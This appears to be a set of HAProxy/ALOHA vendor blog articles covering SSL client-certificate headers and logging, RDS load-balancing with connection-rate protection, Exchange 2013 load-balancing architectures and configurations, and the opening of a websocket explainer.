
SSL Client certificate information in HTTP headers and logs

HAProxy and SSL

HAProxy has many nice features related to SSL, even though SSL support was only introduced recently.

One of those features is client-side certificate management, which has already been discussed on this blog.
One thing was missing from that article, since HAProxy did not have the feature when I first wrote it: the ability to insert client certificate information into HTTP headers and report it in the log line as well.

Fortunately, the devs at HAProxy Technologies keep improving HAProxy, and this is now available (well, it has been for some time now, but I did not have time to write this article earlier).

OpenSSL commands to generate SSL certificates

Just take the script from the HAProxy Technologies github, follow the instructions, and you'll have an environment set up in a few seconds.
Here is the script: https://github.com/exceliance/haproxy/tree/master/blog/ssl_client_certificate_management_at_application_level

Configuration

The configuration below shows a frontend and a backend with SSL offloading and insertion of client certificate information into HTTP headers. As you can see, it is pretty straightforward.

frontend ft_www
 bind 127.0.0.1:8080 name http
 bind 127.0.0.1:8081 name https ssl crt ./server.pem ca-file ./ca.crt verify required
 log-format %ci:%cp [%t] %ft %b/%s %Tq/%Tw/%Tc/%Tr/%Tt %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs {%[ssl_c_verify],%{+Q}[ssl_c_s_dn],%{+Q}[ssl_c_i_dn]} %{+Q}r
 http-request set-header X-SSL                  %[ssl_fc]
 http-request set-header X-SSL-Client-Verify    %[ssl_c_verify]
 http-request set-header X-SSL-Client-DN        %{+Q}[ssl_c_s_dn]
 http-request set-header X-SSL-Client-CN        %{+Q}[ssl_c_s_dn(cn)]
 http-request set-header X-SSL-Issuer           %{+Q}[ssl_c_i_dn]
 http-request set-header X-SSL-Client-NotBefore %{+Q}[ssl_c_notbefore]
 http-request set-header X-SSL-Client-NotAfter  %{+Q}[ssl_c_notafter]
 default_backend bk_www

backend bk_www
 cookie SRVID insert nocache
 server server1 127.0.0.1:8088 maxconn 1
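
For the test, the server itself can be faked with a bare netcat listener bound to the port used on the server line above (flag syntax varies across netcat flavors):

nc -l -p 8088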

To observe the result, I simply fake the server with the netcat listener shown above and watch the headers sent by HAProxy:

X-SSL: 1
X-SSL-Client-Verify: 0
X-SSL-Client-DN: "/C=FR/ST=Ile de France/L=Jouy en Josas/O=haproxy.com/CN=client1/emailAddress=ba@haproxy.com"
X-SSL-Client-CN: "client1"
X-SSL-Issuer: "/C=FR/ST=Ile de France/L=Jouy en Josas/O=haproxy.com/CN=haproxy.com/emailAddress=ba@haproxy.com"
X-SSL-Client-NotBefore: "130613144555Z"
X-SSL-Client-NotAfter: "140613144555Z"

And the associated log line which was generated:

Jun 13 18:09:49 localhost haproxy[32385]: 127.0.0.1:38849 [13/Jun/2013:18:09:45.277] ft_www~ bk_www/server1 
1643/0/1/-1/4645 504 194 - - sHNN 0/0/0/0/0 0/0 
{0,"/C=FR/ST=Ile de France/L=Jouy en Josas/O=haproxy.com/CN=client1/emailAddress=ba@haproxy.com",
"/C=FR/ST=Ile de France/L=Jouy en Josas/O=haproxy.com/CN=haproxy.com/emailAddress=ba@haproxy.com"} "GET /" 

NOTE: I have inserted a few CRLFs to make it more readable.

Now, my HAProxy can deliver the following information to my web server:
  * ssl_fc: did the client use a secure connection (1) or not (0)
  * ssl_c_verify: the status code of the TLS/SSL client connection
  * ssl_c_s_dn: the full Distinguished Name of the certificate presented by the client
  * ssl_c_s_dn(cn): same as above, but extracts only the Common Name
  * ssl_c_i_dn: the full Distinguished Name of the issuer of the certificate presented by the client
  * ssl_c_notbefore: the certificate's start date, as a string formatted YYMMDDhhmmss
  * ssl_c_notafter: the certificate's end date, as a string formatted YYMMDDhhmmss
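
To send a test request through the SSL listener with a client certificate, curl does the job (the certificate file names below are hypothetical; use the ones produced by the script mentioned earlier):

curl --cacert ./ca.crt --cert ./client1.crt --key ./client1.key https://127.0.0.1:8081/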


Microsoft Remote Desktop Services (RDS) Load-Balancing and protection

RDS, RDP, TSE, remoteapp

Whatever you call it, it's the remote desktop protocol from Microsoft, which has been renamed over the product's life.
Basically, it allows users to get connected to a remote server and run an application or a full desktop remotely.

It's more and more fashionable nowadays, because it's easier for IT teams to patch and upgrade a single server hosting many remote desktops than to maintain many laptops individually.

VDI or Virtual Desktop Infrastructure


A Virtual Desktop Infrastructure is an architecture purposely built to export desktops to end users. It can use different types of products, such as Citrix or VMWare View.
Of course, you could build yours using Microsoft RDS together with the ALOHA Load-Balancer to improve the scalability and security of such a platform.

Diagram

In a previous article, we already demonstrated how well the ALOHA Load-Balancer can smartly load-balance Microsoft RDS.
Let's start again from the same platform (I know, I'm a lazy engineer!):
[Diagram: RDP infrastructure]

Windows Broker


When using the ALOHA Load-Balancer, you don't need a Windows broker anymore: the ALOHA is able to send a new user to the least loaded server, as well as resume a broken session.
If an ALOHA outage occurs and a failover from master to slave happens, all the sessions are resumed: the ALOHAs share session affinity within the cluster, ensuring nobody will notice the issue.

Making an RDS platform more secure


It's easy to load-balance the RDS protocol with advanced persistence using the mstshash cookie, since Microsoft documented the protocol. Basically, each user owns a dedicated mstshash cookie value.
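
For the record, this token travels in clear text in the very first bytes of the TCP connection (inside the X.224 Connection Request), which is what the load-balancer parses. It looks like the line below (hypothetical user):

Cookie: mstshash=XLC\user1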

That said, being able to detect weird behaviors or service abusers would be even better.

Actually, the ALOHA Load-Balancer allows you to monitor each source IP address and, even better, each mstshash cookie value.
For any of these objects, we can monitor the connection rate over a period of time, the number of current connections, the bytes in and out (over a period of time), etc…

Now, it's up to you to protect your VDI infrastructure using the ALOHA Load-Balancer. For example:
  * counting the number of active connections per user (mstshash cookie)
  * counting the number of connection attempts per user over the last minute

The above will allow you to detect the following problems or misbehaviors on a VDI platform:
  * a user connected an abnormal number of times
  * a user trying to get connected too quickly, or maybe somebody trying to discover someone else's password 😉
  * etc…

Configuration

The configuration below explains how to create a highly-available VDI infrastructure with advanced persistence and improved security:

# for High-Availability purpose
peers aloha
  peer aloha1 10.0.0.16:1024
  peer aloha2 10.0.0.17:1024

# RDP / TSE configuration
frontend ft_rdp
  bind 10.0.0.18:3389 name rdp
  mode tcp
  timeout client 1h
  option tcplog
  log global
  option tcpka
  # Protection 1
  # wait up to 5s for the mstshash cookie, and reject the client if none
  tcp-request inspect-delay 5s
  tcp-request content reject unless RDP_COOKIE

  default_backend bk_rdp

backend bk_rdp
  mode tcp
  balance roundrobin
  # Options
  timeout server 1h
  timeout connect 4s
  option redispatch
  option tcpka
  option tcplog
  log global
  # sticky persistence + monitoring based on mstshash Cookie
  #    established connection
  #    connection tries over the last minute
  stick-table type string len 32 size 10k expire 1d peers aloha store conn_cur,conn_rate(1m)
  stick on rdp_cookie(mstshash)

  # Protection 2
  # Each user is supposed to get a single active connection at a time, block the second one
  tcp-request content track-sc1 rdp_cookie(mstshash) table bk_rdp
  tcp-request content reject if { sc1_conn_cur ge 2 }

  # Protection 3
  # if a user tried to get connected at least 10 times over the last minute, 
  # it could be a brute force
  tcp-request content reject if { sc1_conn_rate ge 10 }

  # Server farm
  server tse1 10.0.0.23:3389 weight 10 check inter 2s rise 2 fall 3
  server tse2 10.0.0.24:3389 weight 10 check inter 2s rise 2 fall 3
  server tse3 10.0.0.25:3389 weight 10 check inter 2s rise 2 fall 3
  server tse4 10.0.0.26:3389 weight 10 check inter 2s rise 2 fall 3

Troubleshooting RDS connection issues with the ALOHA


The command below, run from your ALOHA Load-Balancer CLI, prints (and refreshes every second) the content of the stick-table with the following information:
  * table name, table size and number of entries currently in the table
  * mstshash cookie value as sent by the RDS client: field key
  * affected server id: field server_id
  * monitored counters and their values: fields conn_rate and conn_cur

while true ; do clear ; echo show table bk_rdp | socat /tmp/haproxy.sock - ; sleep 1 ; done

stick-table output in a normal case


Below, an example of the output when everything goes well:

# table: bk_rdp, type: string, size:20480, used:2
0x912f84: key=Administrator use=1 exp=0 server_id=0 conn_rate(60000)=1 conn_cur=1
0x91ba14: key=XLC\Admin use=1 exp=0 server_id=1 conn_rate(60000)=1 conn_cur=1

stick-table output when tracking an RDS abuser

Below, an example of the output when somebody tries many connections to discover someone’s password:

# table: bk_rdp, type: string, size:20480, used:2
0x912f84: key=Administrator use=1 exp=0 server_id=0 conn_rate(60000)=1 conn_cur=1
0x91ba14: key=XLC\Admin use=1 exp=0 server_id=1 conn_rate(60000)=1 conn_cur=1
0x91ca12: key=XLC\user1 use=1 exp=0 server_id=2 conn_rate(60000)=15 conn_cur=0

NOTE: in this case, the client has been blocked and the user user1 from the domain XLC can't get connected for 1 minute (the conn_rate monitoring period). I agree, this type of protection can end up DOSing your own users…
We can also configure the load-balancer to track the source IP connection rate: if a single source IP tries to connect too often to our RDS farm, we can block it before it reaches the service (keeping in mind that blocking at the IP level may also affect legitimate users sharing that IP).
Combining both the source IP and the mstshash cookie allows us to improve security on the VDI platform.

Securing an RDS platform by combining mstshash cookie and source IP address


The configuration below improves the protection by combining the source IP address and the RDS cookie.
The purpose is to block an abuser at a lower layer (IP), before he can make the Load-Balancer blacklist regular users, even temporarily.

# for High-Availability purpose
peers aloha
  peer aloha1 10.0.0.16:1024
  peer aloha2 10.0.0.17:1024

# RDP / TSE configuration
frontend ft_rdp
  mode tcp
  bind 10.0.0.18:3389 name rdp
  timeout client 1h
  option tcpka
  log global
  option tcplog
  default_backend bk_rdp

backend bk_rdp
  mode tcp
  balance roundrobin

  # Options
  timeout server 1h
  timeout connect 4s
  option redispatch
  option tcpka
  log global
  option tcplog

  # sticky persistence + monitoring based on mstshash Cookie
  #    established connection
  #    connection tries over the last minute
  stick-table type string len 32 size 10k expire 1d peers aloha store conn_cur,conn_rate(1m)
  stick on rdp_cookie(mstshash)

  # Protection 1
  # wait up to 5s for the mstshash cookie, and reject the client if none
  tcp-request inspect-delay 5s
  tcp-request content reject unless RDP_COOKIE
  tcp-request content track-sc1 rdp_cookie(mstshash) table bk_rdp
  tcp-request content track-sc2 src                  table sourceip

# IP layer protection
  #  Protection 2
  #   each single IP is allowed one active connection on the VDI infrastructure (the second one is blocked)
  tcp-request content reject if { sc2_conn_cur ge 2 }

  #  Protection 3
  #   each single IP can try up to 10 connections in a single minute
  tcp-request content reject if { sc2_conn_rate ge 10 }

# RDS / TSE application layer protection
  #  Protection 4
  #   Each user is supposed to get a single active connection at a time, block the second one
  tcp-request content reject if { sc1_conn_cur ge 2 }

  #  Protection 5
  #   if a user tried to get connected at least 10 times over the last minute, 
  #   it could be a brute force
  tcp-request content reject if { sc1_conn_rate ge 10 }

  # Server farm
  server tse1 10.0.0.23:3389 weight 10 check inter 2s rise 2 fall 3
  server tse2 10.0.0.24:3389 weight 10 check inter 2s rise 2 fall 3
  server tse3 10.0.0.25:3389 weight 10 check inter 2s rise 2 fall 3
  server tse4 10.0.0.26:3389 weight 10 check inter 2s rise 2 fall 3

backend sourceip
 stick-table type ip size 20k store conn_cur,conn_rate(1m)

Note that if you have remote sites using your VDI infrastructure, it is also possible to manage a source IP whitelist. The same goes for the mstshash cookies: you can allow some users (like Administrator) to get connected multiple times on the VDI infrastructure.

Source IP and mstshash cookie combined protection


To observe the content of both tables (still refreshed every second), just run the command below on your ALOHA CLI:

while true ; do clear ; echo show table bk_rdp | socat /tmp/haproxy.sock - ; echo "=====" ; echo show table sourceip | socat /tmp/haproxy.sock - ; sleep 1 ; done

And the result:

# table: bk_rdp, type: string, size:20480, used:2
0x23f1424: key=Administrator use=1 exp=0 server_id=0 conn_rate(60000)=0 conn_cur=1
0x2402904: key=XLC\Admin use=1 exp=0 server_id=1 conn_rate(60000)=1 conn_cur=1

=====
# table: sourceip, type: ip, size:20480, used:2
0x23f9f70: key=10.0.4.215 use=2 exp=0 conn_rate(60000)=2 conn_cur=2
0x23f1500: key=10.0.3.20 use=1 exp=0 conn_rate(60000)=0 conn_cur=1

Important Note about Microsoft RDS clients


As Mathew Levett stated on LoadBalancer.org's blog (here is the article: http://blog.loadbalancer.org/microsoft-drops-support-for-mstshash-cookies/), the latest versions of Microsoft RDS clients don't send the full user information in the mstshash cookie. Worse, sometimes the client doesn't send the cookie at all!

In the example we saw above, there were 2 users connected to the infrastructure: the Administrator user was connected from a Linux client using the xfreerdp tool, and we saw its cookie properly in the stick table. The second user, Administrator, from the Windows domain XLC, had his credentials truncated in the stick table (value: XLC\Admin); he was connecting with the Windows 2012 Server Enterprise RDS client.

As lb.org says, hopefully Microsoft will fix this issue. Or maybe there are alternative RDS clients for Windows…

To work around this issue, we can take advantage of the ALOHA: we can fall back to persistence based on the source IP address when there is no mstshash cookie in the client connection information.
Just add the line below, right after the stick on rdp_cookie(mstshash) one:

  stick on src

With such a configuration, the ALOHA Load-Balancer will stick on the mstshash cookie if present, and will fall back to the source IP address otherwise.
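
For clarity, here is what the persistence section of bk_rdp looks like once the fallback is in place (a sketch, re-using the table declared above; the source address is cast to a string when stored):

  stick-table type string len 32 size 10k expire 1d peers aloha store conn_cur,conn_rate(1m)
  stick on rdp_cookie(mstshash)
  stick on src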

Conclusion


Virtual Desktop Infrastructure is a fashionable way of providing end users with access to a company's applications.
If you don't use the right products to build your RDS / TSE / RemoteApp infrastructure, you may run into trouble at some point.

The ALOHA Load-Balancer, thanks to its flexible configuration, has many advantages here.

You can freely try the ALOHA Load-Balancer: it is available for download from our website and allows up to 10 connections with no time limitation: Download the ALOHA Load-Balancer


Microsoft Exchange 2013 architectures

Introduction to Microsoft Exchange 2013

There are 2 types of server in Exchange 2013:
  * Mailbox server
  * Client Access server

Definitions from Microsoft Technet website:
  * The Client Access server provides authentication, limited redirection, and proxy services, and offers all the usual client access protocols: HTTP, POP and IMAP, and SMTP. The Client Access server, a thin and stateless server, doesn’t do any data rendering. There’s never anything queued or stored on the Client Access server.
  * The Mailbox server includes all the traditional server components found in Exchange 2010: the Client Access protocols, the Transport service, the Mailbox databases, and Unified Messaging (the Client Access server redirects SIP traffic generated from incoming calls to the Mailbox server). The Mailbox server handles all activity for the active mailboxes on that server.

High availability in Exchange 2013


Mailbox server high availability is achieved by creating a DAG (Database Availability Group). All the redundancy is handled within the DAG, and the Client Access server automatically retrieves the user session through the DAG when a failover occurs.

Client Access servers must be Load-Balanced to achieve high-availability. There are many ways to load-balance them:
  * DNS round-robin (come on, we're in 2013, stop mentioning this option!)
  * NLB (Microsoft doesn't recommend it)
  * Load-Balancers (also known as Hardware Load-Balancers or HLB): this solution is recommended, since it brings smart load-balancing and advanced health checking.

Performance in Exchange 2013


The key performance factor in Exchange 2013 is obviously the Mailbox server. If it slows down, all its users are affected. So be careful when designing your Exchange platform, and try to create multiple DAGs with a single master per DAG. If one Mailbox server fails or is in maintenance, you'll run in degraded mode (which does not necessarily mean degraded performance), with one Mailbox server being master of 2 DAGs. Disk IOs may also be important here 😉

Concerning the Client Access servers, it's easy to temporarily disable one of them if it's slowing down and route connections to the other Client Access server(s), as shown below.
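
For example, a Client Access server can be put aside from the ALOHA CLI through the stats socket in admin mode (a sketch; the backend and server names are the ones used in the configurations below):

echo disable server bk_exchange/exchange1 | socat /tmp/haproxy.sock -
echo enable server bk_exchange/exchange1 | socat /tmp/haproxy.sock -

The first command stops sending new connections to the server; the second one puts it back in the farm once the maintenance is over.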

Exchange 2013 Architecture


Your architecture should meet your requirements:
  * if you don't need high-availability nor performance, then a single server with both the Client Access and Mailbox roles is sufficient
  * if you need high-availability with a moderate number of users, a couple of servers, each hosting both the Client Access and Mailbox roles, is enough: a DAG ensures high-availability of the Mailbox servers and a Load-Balancer ensures high-availability of the Client Access servers
  * if you need high-availability and performance for a huge number of connections, then go for multiple Mailbox servers, multiple DAGs, multiple Client Access servers and a couple of Load-Balancers

Note that the path from the first architecture to the third one is doable with almost no effort, thanks to Exchange 2013.

Client Access server Load-Balancing in Exchange 2013


Using a Load-Balancer to balance user connections to the Client Access servers allows multiple types of architectures. The current article mainly focuses on these architectures: we do provide load-balancers 😉
If you need help from Exchange architects, we have partners who can assist with the installation, setup and tuning of the whole architecture.

Load-Balancing Client Access servers in Exchange 2013

First of all, bear in mind that Client Access servers in Exchange 2013 are stateless. This is very important from a load-balancing point of view, because it makes the configuration much simpler and more scalable.
Basically, I can see 3 main types of architectures for Client Access server load-balancing in Exchange 2013:
  1. Reverse-proxy mode (also known as source NAT)
  2. Layer 4 NAT mode (destination NAT)
  3. Layer 4 DSR mode (Direct Server Return, also known as Gateway)

Each type of architecture has pros and cons and may impact your global infrastructure. In the next chapters, I'll provide details on each of them.

To illustrate the article, I’ll use a simple Exchange 2013 configuration:
  * 2 Exchange 2013 servers hosting both the Client Access and Mailbox roles
  * 1 ALOHA Load-Balancer
  * 1 client (laptop)
  * all the Exchange services hosted on a single hostname (e.g. mail.domain.com) (it would work as well with one hostname per service)

Reverse-proxy mode (also known as source NAT)


Diagram
The diagram below shows how things work with a Load-balancer in Reverse-proxy mode:
  1. the client establishes a connection onto the Load-Balancer
  2. the Load-Balancer chooses a Client Access server and establishes a connection to it
  3. client and CAS server communicate through the Load-Balancer
Basically, the Load-Balancer breaks the TCP connection between the client and the server: 2 TCP connections are established.

[Diagram: Exchange 2013 in Reverse-proxy mode]

Advantages of Reverse-proxy mode
  * not intrusive: no infrastructure or server changes required
  * ability to perform SSL offloading and layer 7 persistence
  * clients, Client Access servers and load-balancers can be located anywhere in the infrastructure (same subnet or different subnets)
  * can be used in a DMZ
  * A single interface is required on the Load-Balancer

Limitations of Reverse-proxy mode
  * the servers don't see the client IPs (only the LB's one)
  * maximum of ~65K concurrent connections on the Client Access farm (without tweaking the configuration; see the note below)
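
The ~65K limit comes from the number of source ports available for a single source IP. A common workaround, sketched below under the assumption that 10.0.0.100 and 10.0.0.101 are extra addresses owned by the Load-Balancer, is to declare each Client Access server several times with different source IPs, each (source IP, server) couple bringing its own ~64K source ports:

backend bk_exchange
  balance roundrobin
  server exchange1_src1 10.0.0.13:443 source 10.0.0.100 check
  server exchange1_src2 10.0.0.13:443 source 10.0.0.101 check
  server exchange2_src1 10.0.0.14:443 source 10.0.0.100 check
  server exchange2_src2 10.0.0.14:443 source 10.0.0.101 check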

Configuration
To deploy this type of configuration, you can use the LB Admin tab and do it through the GUI, or just copy/paste the following lines into the LB Layer 7 tab:

######## Default values for all entries till next defaults section
defaults
  option  dontlognull             # Do not log connections with no requests
  option  redispatch              # Try another server in case of connection failure
  option  contstats               # Enable continuous traffic statistics updates
  retries 3                       # Try to connect up to 3 times in case of failure 
  backlog 10000                   # Size of SYN backlog queue
  mode tcp                        #alctl: protocol analyser
  log global                      #alctl: log activation
  option tcplog                   #alctl: log format
  timeout client  300s            #alctl: client inactivity timeout
  timeout server  300s            #alctl: server inactivity timeout
  timeout connect   5s            # 5 seconds max to connect or to stay in queue
  default-server inter 3s rise 2 fall 3   #alctl: default check parameters

frontend ft_exchange
  bind 10.0.0.9:443 name https    #alctl: listener https configuration.
  maxconn 10000                   #alctl: max connections (dep. on ALOHA capacity)
  default_backend bk_exchange     #alctl: default farm to use

backend bk_exchange
  balance roundrobin              #alctl: load balancing algorithm
  server exchange1 10.0.0.13:443 check
  server exchange2 10.0.0.14:443 check

(Update the IPs for your infrastructure and point the DNS name to the IP configured on the frontend bind line.)

Layer 4 NAT mode (destination NAT)


Diagram
The diagram below shows how things work with a Load-balancer in Layer 4 NAT mode:
  1. the client establishes a connection to the Client Access server through the Load-Balancer
  2. client and CAS server communicate through the Load-Balancer
Basically, the Load-Balancer acts as a router between the client and the server: a single TCP connection is established directly between the client and the Client Access server, and the LB just forwards packets between them.
[Diagram: Exchange 2013 in Layer 4 NAT mode]

Advantages of Layer 4 NAT mode
  * no connection limit
  * Client Access servers can see the client IP address

Limitations of Layer 4 NAT mode
  * intrusive for the infrastructure: the servers' default gateway must be the load-balancer
  * clients and Client Access servers can't be in the same subnet
  * no SSL acceleration, no advanced persistence
  * 2 interfaces (or VLAN interfaces) must be used on the Load-Balancer

Configuration
To deploy this type of configuration, you can use the LB Admin tab and do it through the GUI, or just copy/paste the following lines into the LB Layer 4 tab:

director exchange 10.0.1.9:443 TCP
  balance roundrobin                               #alctl: load balancing algorithm
  mode nat                                         #alctl: forwarding mode
  check interval 10 timeout 2                      #alctl: check parameters
  option tcpcheck                                  #alctl: adv check parameters
  server exchange1 10.0.0.13:443 weight 10 check   #alctl: server exchange1
  server exchange2 10.0.0.14:443 weight 10 check   #alctl: server exchange2

(Update the IPs for your infrastructure and point the DNS name to the IP configured on the director line.)

Layer 4 DSR mode (Direct Server Return, also known as Gateway)


Diagram
The diagram below shows how things work with a Load-balancer in Layer 4 DSR mode:
  1. the client establishes a connection to the Client Access server through the Load-Balancer
  2. the Client Access server acknowledges the connection directly to the client, bypassing the Load-Balancer on the way back; for this to work, the Client Access server must have the Load-Balancer Virtual IP configured on a loopback interface
  3. client and CAS server keep on communicating the same way: requests through the load-balancer, responses directly from server to client
Basically, the Load-Balancer acts as a router between the client and the server: a single TCP connection is established directly between the client and the Client Access server.
The client and the server can be in the same subnet, like in the diagram, or in two different subnets. In the latter case, the server would use its default gateway (no need to route the traffic back through the load-balancer).
[Diagram: Exchange 2013 in Layer 4 DSR mode]

Advantages of Layer 4 DSR mode
  * no connection limit
  * Client Access servers can see the client IP address
  * clients and Client Access servers can be in the same subnet
  * A single interface is required on the Load-Balancer

Limitations of Layer 4 DSR mode
  * intrusive for the infrastructure: the Load-Balancer Virtual IP must be configured on the Client Access servers (on a loopback interface, see the note after this list)
  * no SSL acceleration, no advanced persistence
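
On a Windows Client Access server, this usually means installing the Microsoft Loopback Adapter, assigning the Virtual IP to it and relaxing the strong host model. A sketch, assuming the adapters are named "loopback" and "net" (adapt the names and the VIP to your setup):

netsh interface ipv4 add address "loopback" 10.0.0.9 255.255.255.255
netsh interface ipv4 set interface "loopback" weakhostreceive=enabled weakhostsend=enabled
netsh interface ipv4 set interface "net" weakhostreceive=enabled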

Configuration
To deploy this type of configuration, you can use the LB Admin tab and do it through the web form, or just copy/paste the following lines into the LB Layer 4 tab:

director exchange 10.0.0.9:443 TCP
  balance roundrobin                               #alctl: load balancing algorithm
  mode gateway                                     #alctl: forwarding mode
  check interval 10 timeout 2                      #alctl: check parameters
  option tcpcheck                                  #alctl: adv check parameters
  server exchange1 10.0.0.13:443 weight 10 check   #alctl: server exchange1
  server exchange2 10.0.0.14:443 weight 10 check   #alctl: server exchange2


Microsoft Exchange 2013 load-balancing with HAProxy

Introduction to Microsoft Exchange server 2013

Note: I'll introduce Exchange from a load-balancing point of view. For detailed information about Exchange's history and new features, please read the pages linked in the Related links section at the bottom of this article.

Exchange is the name of the Microsoft software which provides a business-class mail / calendar / contact platform. It's old software, starting with version 4.0 back in 1996…
Each new version of Exchange Server brings new features, both expanding Exchange's perimeter and making it easier to deploy and administer.

Exchange 2007


Introduction of Outlook Anywhere, AKA RPC over HTTP: it allows remote users to get connected to an Exchange 2007 platform using the HTTPS protocol.

Exchange 2010


For example, Exchange 2010 introduced CAS arrays, making client-side services highly available and scalable. DAGs also brought mail database high-availability. All the client access services required persistence: a user had to be stuck to a single CAS server.
Exchange 2010 also introduced a “layer” between the MAPI RPC clients and the mailbox servers (through the CAS servers), making database failovers transparent.

Exchange 2013


Exchange 2013 improves on the changes brought by Exchange 2010: the CAS servers are now stateless and independent from each other (no more arrays), so no persistence is required anymore.
In Exchange 2013, the raw TCP MAPI RPC services have disappeared and have definitively been replaced by Outlook Anywhere (RPC over HTTP).
Last but not least, SSL offloading does not seem to be allowed for now.

Load-Balancing Microsoft Exchange 2013

First of all, I’m pleased to announce that HAProxy and the ALOHA Load-Balancer are both able to load-balance Exchange 2013 (as well as 2010).

Exchange 2013 Services


As explained in the introduction, the table below summarizes the TCP ports and services involved in an Exchange 2013 platform:

  TCP Port      Protocol         CAS Service name (abbreviation)
  443           HTTPS            Autodiscover (AS), Exchange ActiveSync (EAS),
                                 Exchange Control Panel (ECP), Offline Address Book (OAB),
                                 Outlook Anywhere (OA), Outlook Web App (OWA)
  110 and 995   POP3 / POP3s     POP3
  143 and 993   IMAP4 / IMAP4s   IMAP4

Diagram

There are two main types of architecture:
1. All the services are hosted on a single host name
2. Each service owns its own host name

Exchange 2013 and the Single host name diagram


[Diagram: Exchange 2013, single host name]

Exchange 2013 and the Multiple host name diagram


[Diagram: Exchange 2013, multiple host names]

Configuration

There are two types of configuration with the ALOHA:
  * Layer 4 mode: the LB acts as a router; intrusive for the infrastructure, with the ability to manage millions of connections
  * Layer 7 mode: the LB acts as a reverse-proxy; non-intrusive implementation (source NAT), with the ability to manage thousands of connections and to perform SSL offloading, DDOS protection, advanced persistence, etc…

The present article describes the layer 7 configuration, even though we're going to use it at layer 4 (mode tcp).

Note that it’s up to you to update your DNS configuration to make the hostname point to your Load-Balancer service Virtual IP.
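
For example, with the single-hostname setup and the Virtual IP used below, the zone would simply contain a record like this (mail.domain.com being a placeholder):

mail.domain.com.    IN    A    10.0.0.9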

Template:
Use the configurations below as templates and just change the IP addresses:
  * on the bind lines, set your client-facing service IPs
  * on the server lines, set your CAS server IPs (and add as many lines as you need)
Once updated, just copy/paste the whole configuration, including the defaults section, at the bottom of your ALOHA Layer 7 configuration.

Load-Balancing Exchange 2013 services hosted on a Single host name

######## Default values for all entries till next defaults section
defaults
  option  dontlognull             # Do not log connections with no requests
  option  redispatch              # Try another server in case of connection failure
  option  contstats               # Enable continuous traffic statistics updates
  retries 3                       # Try to connect up to 3 times in case of failure 
  timeout connect 5s              # 5 seconds max to connect or to stay in queue
  timeout http-keep-alive 1s      # 1 second max for the client to post next request
  timeout http-request 15s        # 15 seconds max for the client to send a request
  timeout queue 30s               # 30 seconds max queued on load balancer
  timeout tarpit 1m               # tarpit hold time
  backlog 10000                   # Size of SYN backlog queue

  balance roundrobin                      #alctl: load balancing algorithm
  mode tcp                                #alctl: protocol analyser
  option tcplog                           #alctl: log format
  log global                              #alctl: log activation
  timeout client 300s                     #alctl: client inactivity timeout
  timeout server 300s                     #alctl: server inactivity timeout
  default-server inter 3s rise 2 fall 3   #alctl: default check parameters

frontend ft_exchange_tcp
  bind 10.0.0.9:443 name https          #alctl: listener https configuration.
  maxconn 10000                         #alctl: connection max (depends on capacity)
  default_backend bk_exchange_tcp       #alctl: default farm to use

backend bk_exchange_tcp
  server cas1 10.0.0.15:443 maxconn 10000 check    #alctl: server cas1 configuration.
  server cas2 10.0.0.16:443 maxconn 10000 check    #alctl: server cas2 configuration.

And the result (LB Admin tab):
– Virtual Service: [screenshot: aloha_exchange2013_single_domain_virtual_services]
– Server Farm: [screenshot: aloha_exchange2013_single_domain_server_farm]

Load-Balancing Exchange 2013 services hosted on Multiple host names

######## Default values for all entries till next defaults section
defaults
  option  dontlognull             # Do not log connections with no requests
  option  redispatch              # Try another server in case of connection failure
  option  contstats               # Enable continuous traffic statistics updates
  retries 3                       # Try to connect up to 3 times in case of failure 
  timeout connect 5s              # 5 seconds max to connect or to stay in queue
  timeout http-keep-alive 1s      # 1 second max for the client to post next request
  timeout http-request 15s        # 15 seconds max for the client to send a request
  timeout queue 30s               # 30 seconds max queued on load balancer
  timeout tarpit 1m               # tarpit hold time
  backlog 10000                   # Size of SYN backlog queue

  balance roundrobin                      #alctl: load balancing algorithm
  mode tcp                                #alctl: protocol analyser
  option tcplog                           #alctl: log format
  log global                              #alctl: log activation
  timeout client 300s                     #alctl: client inactivity timeout
  timeout server 300s                     #alctl: server inactivity timeout
  default-server inter 3s rise 2 fall 3   #alctl: default check parameters

frontend ft_exchange_tcp
  bind 10.0.0.5:443  name as        #alctl: listener: autodiscover service
  bind 10.0.0.6:443  name eas       #alctl: listener: Exchange ActiveSync service
  bind 10.0.0.7:443  name ecp       #alctl: listener: Exchange Control Panel service
  bind 10.0.0.8:443  name ews       #alctl: listener: Exchange Web Service service
  bind 10.0.0.9:443  name oa        #alctl: listener: Outlook Anywhere service
  maxconn 10000                     #alctl: connection max (depends on capacity)
  default_backend bk_exchange_tcp   #alctl: default farm to use

backend bk_exchange_tcp
  server cas1 10.0.0.15:443 maxconn 10000 check   #alctl: server cas1 configuration.
  server cas2 10.0.0.16:443 maxconn 10000 check   #alctl: server cas2 configuration.

And the result (LB Admin tab):
– Virtual Service: [screenshot: aloha_exchange2013_multiple_domain_virtual_services]
– Server Farm: [screenshot: aloha_exchange2013_multiple_domain_server_farm]

Conclusion


This is a very basic and straightforward configuration. It could be made much more complete, with per-service timeouts, better health checking, DDOS protection, etc…
I may write further articles about Exchange 2013 load-balancing with our products.

Related links

Exchange 2013 installation steps
Exchange 2013 first configuration
Microsoft Exchange Server (Wikipedia)
Microsoft Exchange official webpage


Websockets load-balancing with HAProxy

Why Websocket ???


The HTTP protocol is client-driven: only the client can request information from a server; a server can never contact a client on its own… HTTP is purely half-duplex. Furthermore, a server can answer only once to a client's request.
Some websites or web applications require the server to update the client from time to time. There were a few ways to do so:

  • the client requests the server at a regular interval to check whether new information is available (polling)
  • the client sends a request to the server and the server answers as soon as it has information to provide (also known as long polling)

But those methods have many drawbacks due to HTTP limitations.
So a new protocol has been designed: websockets, which allows 2-way (full duplex) communication between a client and a server over a single TCP connection. Furthermore, a websocket re-uses the HTTP connection it was initialized on, which means it uses the standard HTTP TCP port.

How does websocket work ???

Basically, a websocket starts with an HTTP request like the one below:

GET / HTTP/1.1
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: avkFOZvLE0gZTtEyrZPolA==
Host: localhost:8080
Sec-WebSocket-Protocol: echo-protocol

The most important part is the “Connection: Upgrade” header, which lets the server know the client wants to switch to another protocol, whose name is provided by the “Upgrade: websocket” header.

When a server with websocket capability receives the request above, it answers with a response like the one below:

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: tD0l5WXr+s0lqKRayF9ABifcpzY=
Sec-WebSocket-Protocol: echo-protocol

The most important part is the status code 101, which acknowledges the protocol switch (from HTTP to websocket), along with the “Connection: Upgrade” and “Upgrade: websocket” headers.

